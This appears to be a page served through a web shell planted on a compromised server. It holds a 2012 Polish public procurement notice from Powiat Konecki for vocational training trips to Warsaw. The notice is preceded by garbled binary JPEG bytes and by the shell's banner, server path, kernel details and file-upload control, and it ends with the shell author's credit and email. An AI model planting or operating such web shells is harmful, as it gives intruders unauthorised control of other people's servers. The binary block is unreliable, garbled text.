JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121030/424332-N-2012.html

<p class="kh_header"><b>Końskie: Zorganizowanie dwóch 3 - dniowych wyjazdowych treningów aktywizacji zawodowej 
dla łącznej grupy 110 osób - Uczestników Projektu i otoczenia
w związku z realizowanym przez Powiatowe Centrum Pomocy Rodzinie w Końskich projektem systemowym pn. My samodzielni, współfinansowanym ze środków Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 424332 - 2012; data zamieszczenia: 30.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Konecki , ul. Staszica 2, 26-200 Końskie, woj. świętokrzyskie, tel. 0-41 372 41 34, faks 0-41 372 83 20.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie dwóch 3 - dniowych wyjazdowych treningów aktywizacji zawodowej 
dla łącznej grupy 110 osób - Uczestników Projektu i otoczenia
w związku z realizowanym przez Powiatowe Centrum Pomocy Rodzinie w Końskich projektem systemowym pn. My samodzielni, współfinansowanym ze środków Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na: zorganizowaniu dwóch                 3 - dniowych wyjazdowych treningów aktywizacji zawodowej dla 110 osób -Uczestników projektu My samodzielni oraz osób z ich otoczenia, podzielonych na dwie grupy, liczące po 55 osób każda z nich, zwanych dalej treningami.
2.	Uczestnikami wyjazdowych treningów aktywizacji zawodowej będą:
-	dorosłe osoby niepełnosprawne, w tym z dysfunkcją narządu ruchu,
-	wychowankowie rodzin zastępczych i placówek opiekuńczo - wychowawczych               w wieku 15-18 lat,
-	usamodzielniani wychowankowie rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 18-25 lat
czyli Uczestnicy projektu My samodzielni oraz osoby z ich otoczenia.
3.	Wymagany termin realizacji przedmiotu zamówienia: Wykonawca jest zobowiązany zrealizować dwa 3 - dniowe wyjazdowe treningi aktywizacji zawodowej dla 110 osób - uczestników treningu podzielonych na dwie grupy, liczące po 55 osób każda z nich, w dwóch odrębnych terminach z uwzględnieniem następujących wymogów:
a) treningi mają się odbyć w okresie od podpisania umowy do dnia 16 grudnia 2012 roku, 
b) każdy z treningów ma się odbyć w ciągu trzech następujących po sobie dni: piątek, sobota, niedziela, z wyłączeniem 23, 24 i 25 listopada 2012 r.
4.	Miejscem realizacji obu treningów jest Warszawa.
5.	Wymagania kadrowe związane z realizacją zamówienia:
a)	1 osoba posiadająca wykształcenie minimum średnie, która będzie uczestniczyła             w każdym z dwóch treningów - jako  opiekun każdej z dwóch grup. Będzie ona odpowiedzialna za wszelkie sprawy organizacyjne związane z prawidłową realizacją treningów. Do jej obowiązków będzie należało m.in. czuwanie nad zapewnieniem należytego transportu uczestników oraz przeprowadzenia zajęć                     i zapewnienia atrakcji, o których mowa w pkt 6 e) OPZ. - zgodnie                                      z harmonogramem, 
b)	trening z zakresu aktywizacji zawodowej w trakcie każdego z dwóch treningów wyjazdowych w wymiarze 12 godzin, przeprowadzi pracownik Zamawiającego.             Wykonawca jest zobligowany do zapewnienia mu w tym zakresie niezbędnych warunków technicznych i organizacyjnych. 
6.	Wymogi Zamawiającego dotyczące realizacji przedmiotu zamówienia: 
a)	Wykonawca w ramach realizacji zamówienia zobowiązany jest zapewnić transport uczestników wyjazdowych treningów na trasie: Końskie - Warszawa i Warszawa - Końskie autokarem kat. LUX. oraz transport uczestników po Warszawie w miejsca planowanych działań/zajęć/spotkań. Zamawiający zastrzega sobie prawo do kontroli pojazdu przed rozpoczęciem podróży, przez odpowiednie służby kontroli. W razie wykazania przez organy kontroli niesprawności autokaru, Wykonawca jest zobowiązany w ciągu 2 godzin do podstawienia pojazdów sprawnych/zastępczych,
b)	Wyjazdy Uczestników zostaną zorganizowane w piątek w godzinach popołudniowych (około godz. 14.00 lub 15.00),
c)	W ramach zamówienia Wykonawca zapewni zakwaterowanie uczestników każdego treningu (2 noclegi) w hotelu, co najmniej 3 gwiazdkowym                            w dzielnicach Warszawy: Śródmieście lub Mokotów lub Ochota lub Wola lub Żoliborz lub Praga Północ lub Praga Południe, spełniającym następujące warunki:
- jest dostosowany do potrzeb osób niepełnosprawnych poruszających się na wózkach inwalidzkich (1 osoba),
- zakwaterowanie uczestników w pokojach max. 4 - osobowych z pełnym węzłem sanitarnym - wc i natryski w każdym pokoju,
- wyposażenie pokoi w jednoosobowe łóżka z pościelą, szafy ubraniowe, szafki przy łóżkach (wyklucza się łóżka piętrowe), TV,
d)	Wykonawca zabezpieczy w hotelu, w którym zostaną zakwaterowani Uczestnicy treningów, klimatyzowaną salę konferencyjną, mieszczącą 55 osób do przeprowadzenia 12 godzin zajęć (dzień I - 3 godziny zajęć, dzień II - 6 godzin zajęć, dzień 3 - 3 godziny zajęć). Sala powinna być wyposażona w rzutnik multimedialny z ekranem, flipchart, odtwarzacz dvd, bezprzewodowy Internet oraz system nagłaśniający,
e)	Wykonawca zapewni wyżywienie uczestników dwóch 3  - dniowych wyjazdowych treningów aktywizacji zawodowej  tj.:
- dzień pierwszy: kolacja w formie szwedzkiego stołu + serwis kawowy podczas wieczornych zajęć z zakresu aktywizacji zawodowej,
- dzień drugi: śniadanie w formie szwedzkiego stołu, zapewnienie serwisu kawowego podczas zajęć z zakresu aktywizacji zawodowej, obiad 2 - daniowy   z deserem, kolacja w formie szwedzkiego stołu,
- dzień trzeci: śniadanie w formie szwedzkiego stołu, zapewnienie serwisu kawowego podczas zajęć z zakresu aktywizacji zawodowej, obiad 2 - daniowy          z deserem, suchy prowiant na drogę powrotną (1 bułka słodka, owoc, woda mineralna niegazowana 0,5 l/os.)
f)	Wykonawca zobowiązany jest do zapewnienia podczas dwóch wyjazdów atrakcji                   o charakterze edukacyjnym i kulturalnym dla wszystkich uczestników, tj.:
- zakup biletów wstępu do teatru na spektakl rozrywkowy,
- zakup biletów wstępu do Muzeum Powstania Warszawskiego i/lub zakup biletów wstępu do Centrum Nauki Kopernik.
Podczas wizyty w Muzeum Powstania Warszawskiego/Centrum Nauki Kopernik  - Wykonawca zapewni opiekę przewodnika,
g)	Wykonawca opłaci ubezpieczenie NNW dla każdego uczestnika 3  - dniowego wyjazdowego treningu obejmujące: przejazd uczestników na trasie Końskie - Warszawa i Warszawa - Końskie oraz całodobowy 3 - dniowy pobyt na wyjazdowym treningu,
h)	Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczestników,                         od momentu wyjazdu do czasu powrotu,
r)	Wykonawca oznaczy miejsca, z których korzystać będą uczestnicy wyjazdowych treningów poprzez umieszczenie informacji dotyczących projektu oraz współfinansowania przez Unię Europejską (przekazanych przez Zamawiającego),
s)	Wykonawca zobowiązany jest przeprowadzić ankiety ewaluacyjne wśród uczestników treningów, zgodnie z przekazanym przez Zamawiającego wzorem,                      i przekazać je Zamawiającemu po zakończeniu realizacji zadania,
t)	Zamawiający zastrzega sobie prawo kontroli w zakresie realizacji przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4, 63.51.00.00-7, 63.51.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny spełniania ww. warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie usługi, z których każda polegała na zorganizowaniu wycieczki i/lub obozu dla co najmniej 70 osób.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny spełniania ww. warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował jedną osobą posiadającą wykształcenie minimum średnie oraz doświadczenie w organizacji jednej wycieczki i/lub obozu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny spełniania ww. warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - sporządzone według wzoru stanowiącego Załącznik Nr 3 do SIWZ,
- 5.2	Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie takich podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w zakresie:
- terminów realizacji zamówienia - w sytuacji wystąpienia zdarzeń natury losowej tj. zdarzeń nagłych, zewnętrznych, które są niezależne od Zamawiającego i Wykonawcy, które stanowią przeszkodę                    w realizacji umowy wg pierwotnego terminu, a których nie można było przewidzieć, ani im zapobiec (siła wyższa),
- osób, które będą uczestniczyć w wykonywaniu zamówienia (wskazanych w ofercie Wykonawcy), pod warunkami określonymi w § 4 ust. 2 wzoru umowy,
- wysokości wynagrodzenia Wykonawcy za realizację przedmiotu umowy - w przypadkach określonych w § 2 ust. 5 i § 5 ust. 7 wzoru umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.konecki.wrota-swietokrzyskie.pl/web/quest/pcpr<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Końskich, ul. Stanisława Staszica 2, 26-200 Końskie pok. Nr 4..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.11.2012 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Końskich, ul. Stanisława Staszica 2, 26-200 Końskie pok. Nr 4..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> - Projekt systemowy realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji społecznej, Poddziałanie 7.1.2 Rozwój i upowszechnianie  aktywnej integracji przez powiatowe centra pomocy rodzinie.
- Wykonawca jest zobowiązany zrealizować dwa 3 - dniowe wyjazdowe treningi aktywizacji zawodowej dla 110 osób - uczestników treningu podzielonych na dwie grupy, liczące po 55 osób każda z nich, w dwóch odrębnych terminach z uwzględnieniem następujących wymogów:
a) treningi mają się odbyć w okresie od podpisania umowy do dnia 16 grudnia 2012 roku, 
b) każdy z treningów ma się odbyć w ciągu trzech następujących po sobie dni: piątek, sobota, niedziela, z wyłączeniem 23, 24 i 25 listopada 2012 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com